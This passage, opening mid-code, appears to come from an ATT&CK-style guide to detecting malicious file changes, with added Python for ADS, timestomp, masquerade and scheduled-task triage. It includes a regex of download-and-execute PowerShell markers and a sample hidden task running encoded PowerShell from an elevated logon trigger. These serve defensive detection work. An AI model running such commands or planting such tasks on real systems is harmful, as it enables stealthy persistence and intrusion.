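ADS_RE = re.compile(r"^(?P<path>(?:[A-Za-z]:)?[^:]+):(?P<stream>[^:\\/]+)(?::\$(?P<type>\w+))?$")
ZONES = {0: "Local machine", 1: "Local intranet", 2: "Trusted sites",
         3: "Internet", 4: "Restricted sites"}
# Containers whose contents historically did not inherit MOTW when opened/mounted
MOTW_BYPASS_CONTAINERS = {".iso", ".img", ".vhd", ".vhdx", ".arj", ".gz", ".gzip"}
EXEC_EXT = {".exe", ".dll", ".ps1", ".vbs", ".js", ".bat", ".cmd", ".scr", ".hta"}


def parse_ads(token):
    """Return (path, stream, type) if token uses ADS syntax, else None."""
    m = ADS_RE.match(token.strip('"'))
    if not m:
        return None
    path = m.group("path")
    if not any(ch in path for ch in "\\/."):
        return None                       # "12:30" in a log line is a time, not a stream
    stype = "$" + m.group("type") if m.group("type") else "$DATA"
    return path, m.group("stream"), stype


def classify_ads(token):
    parsed = parse_ads(token)
    if not parsed:
        return None
    path, stream, stype = parsed
    if stream.lower() == "zone.identifier":
        verdict = "motw"                  # expected on downloads, benign by itself
    elif os.path.splitext(stream)[1].lower() in EXEC_EXT:
        verdict = "executable_in_ads"
    else:
        verdict = "hidden_data"
    return {"path": path, "stream": stream, "type": stype, "verdict": verdict}


def parse_motw(zone_identifier_text):
    """Zone.Identifier is an INI fragment: [ZoneTransfer] ZoneId=3 ReferrerUrl= HostUrl="""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(zone_identifier_text)
    if not cp.has_section("ZoneTransfer"):
        return None
    sec = cp["ZoneTransfer"]
    zone = int(sec.get("ZoneId", "0"))
    return {"zone_id": zone, "zone": ZONES.get(zone, "unknown"),
            "referrer": sec.get("ReferrerUrl"), "host": sec.get("HostUrl")}


def triage_download(filename, zone_identifier_text):
    """Combine the file name with its MOTW stream: an internet-sourced container
    is the case where the inner files arrive without a mark."""
    motw = parse_motw(zone_identifier_text) if zone_identifier_text else None
    if motw is None:
        return ["no MOTW: local origin or the mark was stripped"]
    ext = os.path.splitext(filename)[1].lower()
    if motw["zone_id"] >= 3 and ext in MOTW_BYPASS_CONTAINERS:
        return ["internet-sourced %s container; scan its contents, they carry no MOTW" % ext]
    return []


# Constructed Zone.Identifier stream content for a downloaded ISO
SAMPLE_ZONE_IDENTIFIER = ("[ZoneTransfer]\nZoneId=3\n"
                          "ReferrerUrl=https://example.net/downloads\n"
                          "HostUrl=https://example.net/files/tools.iso\n")
```

Run `classify_ads` over the `TargetFilename`/`Image` fields of Sysmon events and over command-line tokens; on the host, `Get-Item -Path <file> -Stream *` lists the streams and `Get-Content -Stream Zone.Identifier` returns the text that `parse_motw` expects.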

.005 Hidden File System

Detecting the use of a hidden file system may be exceptionally difficult depending on the implementation. Emphasis may be placed on detecting related aspects of the adversary lifecycle, such as how malware interacts with the hidden file system or how a hidden file system is loaded.

.008 Email Hiding Rules

On MacOS systems, monitor for modifications to the RulesActiveState.plist, SyncedRules.plist, UnsyncedRules.plist, and MessageRules.plist files.[33]

Enterprise T1574 Hijack Execution Flow

Monitor file systems for moving, renaming, replacing, or modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, etc., are suspicious. Modifications to or creation of .manifest and .local redirection files that do not correlate with software updates are suspicious.

.001 DLL Search Order Hijacking

Monitor for changes made to .manifest/.local redirection files, and monitor file systems for moving, renaming, replacing, or modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, etc., are suspicious.

.002 DLL Side-Loading

Monitor for changes made to files for unexpected modifications to access permissions and attributes.

.004 Dylib Hijacking

Monitor file systems for moving, renaming, replacing, or modifying dylibs. Changes in the set of dylibs that are loaded by a process (compared to past behavior) that do not correlate with known software, patches, etc., are suspicious. Check the system for multiple dylibs with the same name and monitor which versions have historically been loaded into a process.

.005 Executable Installer File Permissions Weakness

Monitor for changes to binaries and service executables that may normally occur during software updates.

.006 Dynamic Linker Hijacking

Monitor for changes to environment variables and files associated with loading shared libraries such as LD_PRELOAD on Linux and DYLD_INSERT_LIBRARIES on macOS.

.008 Path Interception by Search Order Hijacking

Monitor program metadata for modifications such as removal of the full path to an executable, which leaves the program open to this technique. Also monitor file modifications such as programs being renamed to the names of Windows system utilities.

.009 Path Interception by Unquoted Path

Monitor for changes made to files that may execute their own malicious payloads by hijacking vulnerable file path references.
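The path weaknesses in the .009 and .010 rows can be audited directly from the service configuration. The following is an added example (not code from the ATT&CK page) that takes service ImagePath values, reports unquoted paths containing spaces together with the exact binaries CreateProcess would try before the intended one, and reports service binaries living in user-writable directories. Sample values are constructed; the writable-directory list is an assumption to confirm with icacls on the real host.

```python
"""Audit service ImagePath values for unquoted-path and weak-directory issues
(added example; sample services constructed)."""
import ntpath
import re

EXEC_EXT = (".exe", ".com", ".bat", ".cmd")
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\", "c:\\temp\\")
ENV = {"%systemroot%": "C:\\Windows", "%windir%": "C:\\Windows",
       "%programfiles%": "C:\\Program Files", "%programfiles(x86)%": "C:\\Program Files (x86)"}


def expand(path):
    for var, val in ENV.items():
        path = re.sub(re.escape(var), lambda _m, v=val: v, path, flags=re.IGNORECASE)
    return path


def split_image_path(image_path):
    """Return (binary_path, quoted) from a raw ImagePath value."""
    s = expand(image_path.strip())
    if s.startswith('"'):
        end = s.find('"', 1)
        return (s[1:end] if end > 0 else s[1:]), True
    # Unquoted: the binary ends at the first token carrying an executable extension
    tokens = s.split(" ")
    for i, tok in enumerate(tokens):
        if tok.lower().endswith(EXEC_EXT):
            return " ".join(tokens[:i + 1]), False
    return s, False


def interception_candidates(binary_path):
    """Paths CreateProcess tries before the intended binary when the value is
    unquoted: each prefix ending at a space, with .exe appended when the last
    component has no extension (the documented CreateProcess rule)."""
    parts = binary_path.split(" ")
    out = []
    for i in range(1, len(parts)):
        prefix = " ".join(parts[:i])
        if "." not in ntpath.basename(prefix):
            prefix += ".exe"
        out.append(prefix)
    return out


def audit_service(name, image_path):
    binary, quoted = split_image_path(image_path)
    findings = []
    if not quoted and " " in binary:
        findings.append({"service": name, "issue": "unquoted path with spaces",
                         "candidates": interception_candidates(binary)})
    if binary.lower().startswith(USER_WRITABLE):
        findings.append({"service": name, "issue": "binary in user-writable directory",
                         "binary": binary})
    return findings


# Constructed ImagePath values (HKLM\SYSTEM\CurrentControlSet\Services\<name>\ImagePath)
SAMPLE_SERVICES = {
    "AcmeAgent": r"C:\Program Files\Acme Agent\bin\agent.exe --service",
    "AcmeUpdater": r'"C:\Program Files\Acme Agent\bin\updater.exe" /quiet',
    "Dhcp": r"%SystemRoot%\system32\svchost.exe -k LocalServiceNetworkRestricted",
    "Sync": r"C:\ProgramData\SyncTool\sync.exe",
}


def audit_all(services=SAMPLE_SERVICES):
    return [f for name, path in services.items() for f in audit_service(name, path)]
```

Feed it the `Name`/`PathName` pairs from `Get-CimInstance Win32_Service`; for each candidate path, the remaining check is whether the containing directory is writable by non-administrators.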

.010 Services File Permissions Weakness

Monitor for modification of binaries and service executables that do not occur during a regular software update or an update scheduled by the organization. Modification of files considers actions such as renaming and directory moving.

Enterprise T1562 Impair Defenses

Monitor changes made to configuration files that contain settings for logging and defensive tools.

.012 Disable or Modify Linux Audit System

Monitor changes made to the /etc/audit/audit.rules file containing the sequence of auditctl commands loaded at boot time.

Enterprise T1070 Indicator Removal

Monitor for changes made to files that may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware.

.002 Clear Linux or Mac System Logs

Monitor for changes made to system log files, typically stored in /var/log or /Library/Logs, for unexpected modifications to contents, access permissions, and attributes.

.003 Clear Command History

Monitor for changes made to command history files, such as ConsoleHost_history.txt, ~/.zsh_history, or ~/.bash_history, for unexpected modifications to contents, access permissions, and attributes.

Analytic 1 : Modification of access rights to command history files

suspicious_files = filter ProcessGuid, ProcessFilePath, UserName, FilePath where (event_id == "4663" AND FilePath LIKE '%ConsoleHost_history.txt%' AND ObjectType == "File" AND (UserAccessList LIKE '%1539%' or UserAccessList LIKE '%WRITE_DAC%')) OR (event_id == "4670" AND FilePath LIKE '%ConsoleHost_history.txt%' AND ObjectType == "File" AND (ObjectNewSd LIKE '%;FA%' OR ObjectNewSd LIKE '%;FW%' OR ObjectNewSd LIKE '%;BU%'))
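Analytic 1 above is written as pattern matches on the event text (`%%1539` for WRITE_DAC, and `;FA`, `;FW`, `;BU` substrings of the new security descriptor). The following is an added example (not code from the ATT&CK page) that implements the same analytic but parses the SDDL, so that only an access-allowed ACE granting a write-capable right to a broad principal (Everyone, Users, Authenticated Users, and similar) counts, and for EID 4670 only ACEs that were not already present in ObjectOldSd are reported. The events are constructed; the principal list is an assumption.

```python
"""Analytic 1 with the security descriptor actually parsed (added example)."""
import re

# SDDL right abbreviations -> access mask bits
SDDL_RIGHTS = {
    "GA": 0x10000000, "GR": 0x80000000, "GW": 0x40000000, "GX": 0x20000000,
    "RC": 0x00020000, "SD": 0x00010000, "WD": 0x00040000, "WO": 0x00080000,
    "FA": 0x001F01FF, "FR": 0x00120089, "FW": 0x00120116, "FX": 0x001200A0,
    "CC": 0x1, "DC": 0x2, "LC": 0x4, "SW": 0x8, "RP": 0x10, "WP": 0x20,
    "DT": 0x40, "LO": 0x80, "CR": 0x100,
}
# FILE_WRITE_DATA | FILE_APPEND_DATA | DELETE | WRITE_DAC | WRITE_OWNER | GENERIC_WRITE | GENERIC_ALL
WRITE_MASK = 0x2 | 0x4 | 0x10000 | 0x40000 | 0x80000 | 0x40000000 | 0x10000000
WRITE_DAC = 0x40000
BROAD_PRINCIPALS = {"WD", "BU", "AU", "AN", "IU", "BG",                   # SDDL aliases
                    "S-1-1-0", "S-1-5-11", "S-1-5-32-545", "S-1-5-7"}      # and raw SIDs
ACE_RE = re.compile(r"\(([^)]*)\)")
HISTORY_FILES = ("consolehost_history.txt", ".bash_history", ".zsh_history")


def rights_to_mask(rights):
    if rights[:2].lower() == "0x":
        return int(rights, 16)
    mask = 0
    for i in range(0, len(rights), 2):             # two-letter abbreviations, concatenated
        mask |= SDDL_RIGHTS.get(rights[i:i + 2].upper(), 0)
    return mask


def dacl_aces(sddl):
    start = sddl.find("D:")
    if start < 0:
        return []
    end = sddl.find("S:", start + 2)               # a SACL, if present, follows the DACL
    return [ace.split(";") for ace in ACE_RE.findall(sddl[start + 2:end if end >= 0 else None])]


def broad_write_grants(sddl):
    grants = set()
    for parts in dacl_aces(sddl):
        if len(parts) < 6 or parts[0] != "A":      # only access-allowed ACEs
            continue
        rights, sid = parts[2], parts[5]
        if sid in BROAD_PRINCIPALS and rights_to_mask(rights) & WRITE_MASK:
            grants.add((sid, rights))
    return grants


def evaluate(event):
    """event: dict of Windows Security event fields; returns a finding or None."""
    path = event.get("ObjectName", "")
    if event.get("ObjectType") != "File" or not path.lower().endswith(HISTORY_FILES):
        return None
    base = {"path": path, "subject": event.get("SubjectUserName"), "pid": event.get("ProcessId")}
    if str(event.get("EventID")) == "4663":
        mask = int(event.get("AccessMask", "0"), 16)
        if "%%1539" in event.get("AccessList", "") or mask & WRITE_DAC:
            return {**base, "event": 4663, "reason": "WRITE_DAC requested on history file"}
    elif str(event.get("EventID")) == "4670":
        added = (broad_write_grants(event.get("ObjectNewSd", ""))
                 - broad_write_grants(event.get("ObjectOldSd", "")))
        if added:
            return {**base, "event": 4670, "reason": "write access newly granted", "grants": sorted(added)}
    return None


HISTORY = r"C:\Users\bob\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"
# Constructed events: WRITE_DAC request, plain read, a DACL widened to Everyone, unrelated file
SAMPLE_EVENTS = [
    {"EventID": 4663, "ObjectType": "File", "SubjectUserName": "bob", "ProcessId": "0x1a2c",
     "ObjectName": HISTORY, "AccessList": "%%1539", "AccessMask": "0x40000"},
    {"EventID": 4663, "ObjectType": "File", "SubjectUserName": "bob", "ProcessId": "0x1a2c",
     "ObjectName": HISTORY, "AccessList": "%%4416", "AccessMask": "0x1"},
    {"EventID": 4670, "ObjectType": "File", "SubjectUserName": "bob", "ProcessId": "0x1a2c",
     "ObjectName": HISTORY,
     "ObjectOldSd": "O:BAG:SYD:AI(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0x1200a9;;;BU)",
     "ObjectNewSd": "O:BAG:SYD:AI(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;;FA;;;WD)"},
    {"EventID": 4670, "ObjectType": "File", "SubjectUserName": "SYSTEM", "ProcessId": "0x4",
     "ObjectName": r"C:\Windows\Temp\install.log",
     "ObjectOldSd": "D:(A;;FA;;;BA)", "ObjectNewSd": "D:(A;;FA;;;WD)"},
]


def run(events=SAMPLE_EVENTS):
    return [f for f in map(evaluate, events) if f]
```

Administrators and SYSTEM keep FA on these files by default, which is why the substring match on `;FA` in the original analytic fires on every ACL change; restricting the match to broad principals and to newly added ACEs removes that noise.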

.006 Timestomp

Monitor for unexpected modifications to file timestamps
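Timestamp modification on NTFS leaves two measurable traces: SetFileTime changes only the $STANDARD_INFORMATION (SI) times, never the $FILE_NAME (FN) set, and most stomping tools write whole seconds, so the sub-second part of the SI values is zero while the FN values keep their 100 ns ticks. The following is an added example (not code from the ATT&CK page) applying those two heuristics to records as an MFT parser would export them. The records are constructed and the field names are assumed; because moving a file rewrites FN from SI, these remain heuristics rather than proof.

```python
"""Timestomp heuristics over $STANDARD_INFORMATION vs $FILE_NAME timestamps
(added example; records constructed, field names assumed)."""
from datetime import datetime, timezone


def parse_ts(s):
    """ISO-8601 with up to 7 fractional digits (NTFS 100 ns ticks) -> (datetime, ticks).
    Keeping ticks separately avoids losing precision in datetime's microseconds."""
    base, _, frac = s.rstrip("Z").partition(".")
    ticks = int((frac + "0000000")[:7]) if frac else 0
    return datetime.fromisoformat(base).replace(tzinfo=timezone.utc), ticks


def timestomp_findings(rec):
    si = {k: parse_ts(v) for k, v in rec["si"].items()}
    fn = {k: parse_ts(v) for k, v in rec["fn"].items()}
    findings = []
    # FN creation is set by the kernel and survives SetFileTime; SI earlier than FN is backdating.
    if si["created"] < fn["created"]:
        findings.append("SI created (%s) earlier than FN created (%s)"
                        % (rec["si"]["created"], rec["fn"]["created"]))
    # Only created/modified/accessed are settable from user mode; a zeroed
    # sub-second part on all three next to FN values that have one is a tool signature.
    settable = ("created", "modified", "accessed")
    if all(si[k][1] == 0 for k in settable) and any(fn[k][1] != 0 for k in fn):
        findings.append("SI timestamps have zero sub-second part while FN does not")
    return findings


SAMPLE_RECORDS = [
    {"path": r"C:\Windows\System32\drivers\legit.sys",
     "si": {"created": "2021-06-10T09:12:44.1234567Z", "modified": "2021-06-10T09:12:44.1234567Z",
            "accessed": "2024-01-05T08:00:00.0012345Z", "mft_changed": "2021-06-10T09:12:44.1234567Z"},
     "fn": {"created": "2021-06-10T09:12:44.1234567Z", "modified": "2021-06-10T09:12:44.1234567Z",
            "accessed": "2021-06-10T09:12:44.1234567Z", "mft_changed": "2021-06-10T09:12:44.1234567Z"}},
    {"path": r"C:\Windows\System32\drivers\evil.sys",
     "si": {"created": "2019-03-04T12:00:00Z", "modified": "2019-03-04T12:00:00Z",
            "accessed": "2019-03-04T12:00:00Z", "mft_changed": "2024-02-20T03:15:09.5551112Z"},
     "fn": {"created": "2024-02-20T03:15:09.5550000Z", "modified": "2024-02-20T03:15:09.5550000Z",
            "accessed": "2024-02-20T03:15:09.5550000Z", "mft_changed": "2024-02-20T03:15:09.5550000Z"}},
]


def scan(records=SAMPLE_RECORDS):
    return {r["path"]: timestomp_findings(r) for r in records}
```

The SI "MFT entry changed" time is not settable from user mode either, so a recent value there beside old created/modified values is the corroborating clue to look at next.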

.007 Clear Network Connection History and Configurations

Monitor changes to files that may be indicators of deleting or altering malicious network configuration settings as well as generated artifacts on a host system that highlight network connection history, such as Default.rdp or /var/log/.

.008 Clear Mailbox Data

Monitor for changes made to generated artifacts on a host system, including logs or captured files such as quarantined emails.

On Windows 10, mail application data is stored in C:\Users\Username\AppData\Local\Comms\Unistore\data. On Linux, mail data is stored in /var/spool/mail or /var/mail. On macOS, mail data is stored in ~/Library/Mail.

.009 Clear Persistence

Monitor for changes made to files that may delete or alter generated artifacts associated with persistence on a host system.

ICS T0872 Indicator Removal on Host

Monitor for changes made to files that may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware.

Enterprise T1056 Input Capture

Monitor for changes made to files for unexpected modifications to access permissions and attributes.

.003 Web Portal Capture

Monitor for changes to files in the web directory for organization login pages that do not match authorized updates to the web server's content.

Enterprise T1036 Masquerading

Monitor for changes made to files outside of an update or patch that may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Windows Event ID 4663 (An Attempt Was Made to Access An Object) can be used to alert on attempted file accesses that may be associated with Masquerading.

.003 Rename System Utilities

Monitor for file names on disk that do not match the name recorded in the binary's PE metadata (the OriginalFilename field of the version resource). This is a likely indicator that a binary was renamed after it was compiled.

Note: There are no standard Windows events for file modification. However, Event ID 4663 (An attempt was made to access an object) can be used to audit and alert on attempts to access system utility binaries; the "Accesses" field can be used to filter by type of access (e.g., MODIFY vs DELETE).

.008 Masquerade File Type

Check and ensure that file headers/signature and extensions match using magic bytes detection and/or file signature validation.[18] In Linux, the file command may be used to check the file signature.[19]
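Both masquerade checks above (.003 renamed utility, .008 mismatched file type) in one added example, not code from the ATT&CK page. The renamed-utility check compares the on-disk name with the OriginalFileName from the version resource, which Sysmon EID 1 already reports; the file-type check tests the magic bytes of each known family within the window where its header may sit (a PDF header may appear anywhere in the first 1 KiB), and reports a polyglot when more than one family matches. The signature table is a subset assumed for the example and the sample files are constructed byte strings.

```python
"""Renamed-binary and magic-byte masquerade checks (added example)."""
import os

# (signature, window in which it may start, family, extensions that legitimately carry it)
SIGNATURES = [
    (b"MZ", 1, "pe", {".exe", ".dll", ".sys", ".scr", ".cpl", ".ocx", ".drv", ".efi"}),
    (b"\x7fELF", 1, "elf", {"", ".so", ".ko"}),
    (b"%PDF", 1024, "pdf", {".pdf"}),
    (b"PK\x03\x04", 1, "zip", {".zip", ".docx", ".xlsx", ".pptx", ".jar", ".apk", ".odt"}),
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", 1, "ole", {".doc", ".xls", ".ppt", ".msi", ".msg"}),
    (b"\x89PNG\r\n\x1a\n", 1, "png", {".png"}),
    (b"\xff\xd8\xff", 1, "jpeg", {".jpg", ".jpeg"}),
    (b"GIF8", 1, "gif", {".gif"}),
    (b"Rar!\x1a\x07", 1, "rar", {".rar"}),
    (b"7z\xbc\xaf\x27\x1c", 1, "7z", {".7z"}),
    (b"\x1f\x8b", 1, "gzip", {".gz", ".tgz"}),
    (b"{\\rtf", 1, "rtf", {".rtf"}),
    (b"#!", 1, "script", {".sh", ".py", ".pl", ".rb", ""}),
]


def detect_types(data):
    """All families whose signature starts inside its allowed window; more than
    one means a polyglot (e.g. an MZ stub with a PDF header further down)."""
    head = data[:1024]
    return [family for sig, window, family, _ in SIGNATURES
            if head.find(sig, 0, window + len(sig) - 1) >= 0]


def extension_mismatch(filename, data):
    ext = os.path.splitext(filename)[1].lower()
    families = detect_types(data)
    if not families:
        return None                         # unknown content, nothing to compare against
    if len(families) > 1:
        return {"file": filename, "issue": "polyglot", "families": families}
    allowed = set().union(*(exts for _, _, fam, exts in SIGNATURES if fam in families))
    if ext not in allowed:
        return {"file": filename, "issue": "extension/content mismatch",
                "extension": ext, "content": families[0]}
    return None


def renamed_utility(image_path, original_file_name):
    """Compare the on-disk name with the version resource's OriginalFilename.
    Sysmon reports '?' or '-' when the binary carries no version resource."""
    if not original_file_name or original_file_name in ("?", "-"):
        return None
    disk = os.path.basename(image_path.replace("\\", "/")).lower()
    if disk != original_file_name.lower():
        return {"file": image_path, "issue": "renamed binary", "original": original_file_name}
    return None


# Constructed samples: genuine PDF, PE named .pdf, genuine docx (zip), zip named .pdf, PE/PDF polyglot
SAMPLES = [
    ("invoice.pdf", b"%PDF-1.7\n%\xe2\xe3\xcf\xd3\n1 0 obj\n"),
    ("invoice_scan.pdf", b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff" + b"\x00" * 50),
    ("report.docx", b"PK\x03\x04\x14\x00\x06\x00[Content_Types].xml"),
    ("resume.pdf", b"PK\x03\x04\x14\x00\x00\x00\x08\x00"),
    ("update.exe", b"MZ" + b"\x00" * 200 + b"%PDF-1.4 polyglot trailer"),
]


def scan_samples(samples=SAMPLES):
    return [f for f in (extension_mismatch(n, d) for n, d in samples) if f]
```

`file` on Linux performs the same magic-byte test with a far larger table; the point of the polyglot branch is that the first match alone, which is what most tools report, can be the benign half.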

ICS T0849 Masquerading

Monitor for changes made to files outside of an update or patch that may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools.

Enterprise T1556 Modify Authentication Process

Monitor for suspicious modification of files associated with authentication processes, such as configuration files and module paths (e.g. /etc/pam.d/). Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files. Also monitor for access to certificates and cryptographic keys material.

.001 Domain Controller Authentication

Monitor for changes to functions exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).[34]

.003 Pluggable Authentication Modules

Monitor PAM configuration and module paths (ex: /etc/pam.d/) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.

.004 Network Device Authentication

Monitor for changes to the checksum of the operating system image file, and verify the image of the operating system in memory.[35][36] Detection of this behavior may be difficult; detection efforts may instead be focused on closely related adversary behaviors, such as Modify System Image.

.007 Hybrid Identity

Monitor for suspicious modification of files associated with hybrid identity authentication processes, such as configuration files. Monitor for access to certificates and cryptographic keys material.

Enterprise T1601 Modify System Image

Most embedded network devices provide a command to print the version of the currently running operating system. Use this command to query the operating system for its version number and compare it to what is expected for the device in question. Because this method may be used in conjunction with Patch System Image, it may be appropriate to also verify the integrity of the vendor-provided operating system image file.

Compare the checksum of the operating system file with the checksum of a known good copy from a trusted source. Some embedded network device platforms may have the capability to calculate the checksum of the file, while others may not. Even for those platforms that have the capability, it is recommended to download a copy of the file to a trusted computer to calculate the checksum with software that is not compromised. [35]

Many vendors of embedded network devices can provide advanced debugging support that will allow them to work with device owners to validate the integrity of the operating system running in memory. If a compromise of the operating system is suspected, contact the vendor technical support and seek such services for a more thorough inspection of the current running system. [36]

.001 Patch System Image

Compare the checksum of the operating system file with the checksum of a known good copy from a trusted source. Some embedded network device platforms may have the capability to calculate the checksum of the file, while others may not. Even for those platforms that have the capability, it is recommended to download a copy of the file to a trusted computer to calculate the checksum with software that is not compromised. [35]

Many vendors of embedded network devices can provide advanced debugging support that will allow them to work with device owners to validate the integrity of the operating system running in memory. If a compromise of the operating system is suspected, contact the vendor technical support and seek such services for a more thorough inspection of the current running system. [36]

.002 Downgrade System Image

Monitor for changes made to the operating system image of a network device. Because an image downgrade may be used in conjunction with Patch System Image, it may be appropriate to also verify the integrity of the vendor-provided operating system image file.

Enterprise T1137 Office Application Startup

Monitor for changes made to files that may leverage Microsoft Office-based applications for persistence between startups.

.001 Office Template Macros

Monitor for changes made to files that may abuse Microsoft Office templates to obtain persistence on a compromised system. Modification to base templates, like Normal.dotm, should also be investigated since the base templates should likely not contain VBA macros. Changes to the Office macro security settings should also be investigated.

.002 Office Test

Monitor for changes made to files that may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system.

.006 Add-ins

Monitor for changes made to files that may abuse Microsoft Office add-ins to obtain persistence on a compromised system.

Enterprise T1647 Plist File Modification

Monitor for plist file modification, especially if immediately followed by other suspicious events such as code execution from ~/Library/Scripts or ~/Library/Preferences. Also, monitor for significant changes to any path pointers in a modified plist.

Enterprise T1653 Power Settings

Monitor for unexpected changes to configuration files associated with the power settings of a system.

Enterprise T1055 Process Injection

Monitor for changes made to files that may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges.

.009 Proc Memory

Monitor for changes made to /proc files that may inject malicious code into processes via the /proc filesystem in order to evade process-based defenses as well as possibly elevate privileges. Users should not have permission to modify these in most cases.

ICS T0873 Project File Infection

Monitor for unexpected changes to project files, although if the malicious modification occurs in tandem with legitimate changes it will be difficult to isolate the unintended changes by analyzing only file systems modifications.

Enterprise T1014 Rootkit

Monitor for changes and the existence of unrecognized DLLs, drivers, devices, services, and to the MBR. [37]

Enterprise T1053 Scheduled Task/Job

Monitor for changes made to files that may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code.

.002 At

On Windows, monitor Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks, especially those that do not correlate with known software, patch cycles, etc. On Linux and macOS, all at jobs are stored in /var/spool/cron/atjobs/.[38]

.003 Cron

Monitor for changes made to files for unexpected modifications to access permissions and attributes.

.005 Scheduled Task

Monitor Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc.
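The task definitions stored under %systemroot%\System32\Tasks are XML, so the correlation with known software asked for above can start from their contents. The following is an added example (not code from the ATT&CK page) that parses a task file, extracts its triggers, principal, actions and Hidden setting, and flags actions whose command lives outside Windows or Program Files, whose arguments carry encoded or download-and-execute PowerShell patterns, or that use a ComHandler (whose CLSID must then be resolved to a DLL). Task files on disk are UTF-16 XML, so they are read as bytes; the trusted-directory list and argument patterns are assumptions, and the two tasks below are constructed.

```python
"""Triage a Task Scheduler XML definition (added example; heuristics assumed)."""
import re
import xml.etree.ElementTree as ET

TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
ENV = {"%systemroot%": "C:\\Windows", "%windir%": "C:\\Windows",
       "%programfiles%": "C:\\Program Files", "%programdata%": "C:\\ProgramData"}
SUSPICIOUS_ARGS = re.compile(
    r"(-enc(odedcommand)?\b|-e\s+[A-Za-z0-9+/=]{20,}|frombase64string|downloadstring|"
    r"iex\b|invoke-expression|-w(indowstyle)?\s+hidden|\bmshta\b|\bregsvr32\b)", re.I)


def expand(path):
    for var, val in ENV.items():
        path = re.sub(re.escape(var), lambda _m, v=val: v, path, flags=re.I)
    return path.strip('"')


def parse_task(xml_data):
    """xml_data: bytes as read from disk (UTF-16 with BOM) or an str."""
    root = ET.fromstring(xml_data)
    for el in root.iter():                       # drop the task namespace from every tag
        el.tag = el.tag.rsplit("}", 1)[-1]

    def text(path, node=root):
        return (node.findtext(path) or "").strip()

    actions = []
    for ex in root.findall("Actions/Exec"):
        actions.append({"kind": "exec", "command": expand(text("Command", ex)),
                        "arguments": text("Arguments", ex)})
    for com in root.findall("Actions/ComHandler"):
        actions.append({"kind": "com", "clsid": text("ClassId", com)})
    return {
        "author": text("RegistrationInfo/Author"),
        "user": text("Principals/Principal/UserId"),
        "run_level": text("Principals/Principal/RunLevel"),
        "hidden": text("Settings/Hidden").lower() == "true",
        "triggers": [t.tag for t in root.findall("Triggers/*")],
        "actions": actions,
    }


def triage_task(task):
    findings = []
    for a in task["actions"]:
        if a["kind"] == "com":
            findings.append("ComHandler action %s: resolve the CLSID's InprocServer32 DLL" % a["clsid"])
            continue
        if a["command"] and not a["command"].lower().startswith(TRUSTED_DIRS):
            findings.append("command outside Windows/Program Files: " + a["command"])
        if SUSPICIOUS_ARGS.search(a["arguments"]):
            findings.append("suspicious arguments: " + a["arguments"][:60])
    if task["hidden"]:
        findings.append("task is hidden")
    if findings and (task["run_level"] == "HighestAvailable" or task["user"].upper() == "S-1-5-18"):
        findings.append("runs elevated as " + (task["user"] or "the author's highest level"))
    return findings


TASK_NS = "http://schemas.microsoft.com/windows/2004/02/mit/task"
# Constructed task: logon-triggered, hidden, encoded PowerShell plus a binary in a public folder
SAMPLE_TASK = ("""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.4" xmlns="%s">
  <RegistrationInfo><Author>WORKSTATION\\bob</Author></RegistrationInfo>
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-21-1111-2222-3333-1001</UserId>
    <RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Settings><Hidden>true</Hidden></Settings>
  <Actions Context="Author">
    <Exec><Command>%%SystemRoot%%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe</Command>
      <Arguments>-NoP -W Hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA</Arguments></Exec>
    <Exec><Command>C:\\Users\\Public\\Libraries\\svchost.exe</Command></Exec>
  </Actions>
</Task>""" % TASK_NS).encode("utf-16")
# Constructed benign task of the kind Windows ships
BENIGN_TASK = ("""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="%s">
  <Triggers><CalendarTrigger><StartBoundary>2024-01-01T03:00:00</StartBoundary></CalendarTrigger></Triggers>
  <Principals><Principal id="LocalSystem"><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Settings><Hidden>false</Hidden></Settings>
  <Actions Context="LocalSystem"><Exec><Command>%%windir%%\\system32\\defrag.exe</Command>
    <Arguments>-c -h -o -$</Arguments></Exec></Actions>
</Task>""" % TASK_NS).encode("utf-16")
```

Run `parse_task(open(path, "rb").read())` over every file under `%systemroot%\System32\Tasks` on a File Modification event for that tree, and diff the parsed dictionaries against the previous snapshot rather than the raw XML, which Task Scheduler rewrites on every registration.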

.006 Systemd Timers

Monitor for changes made to systemd timer unit files for unexpected modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and ~/.config/systemd/user/ directories, as well as associated symbolic links.

Enterprise T1505 Server Software Component

Monitor for changes made to files that may abuse legitimate extensible development features of servers to establish persistent access to systems.

.003 Web Shell

Monitor for changes made to files that may backdoor web servers with web shells to establish persistent access to systems.

.004 IIS Components

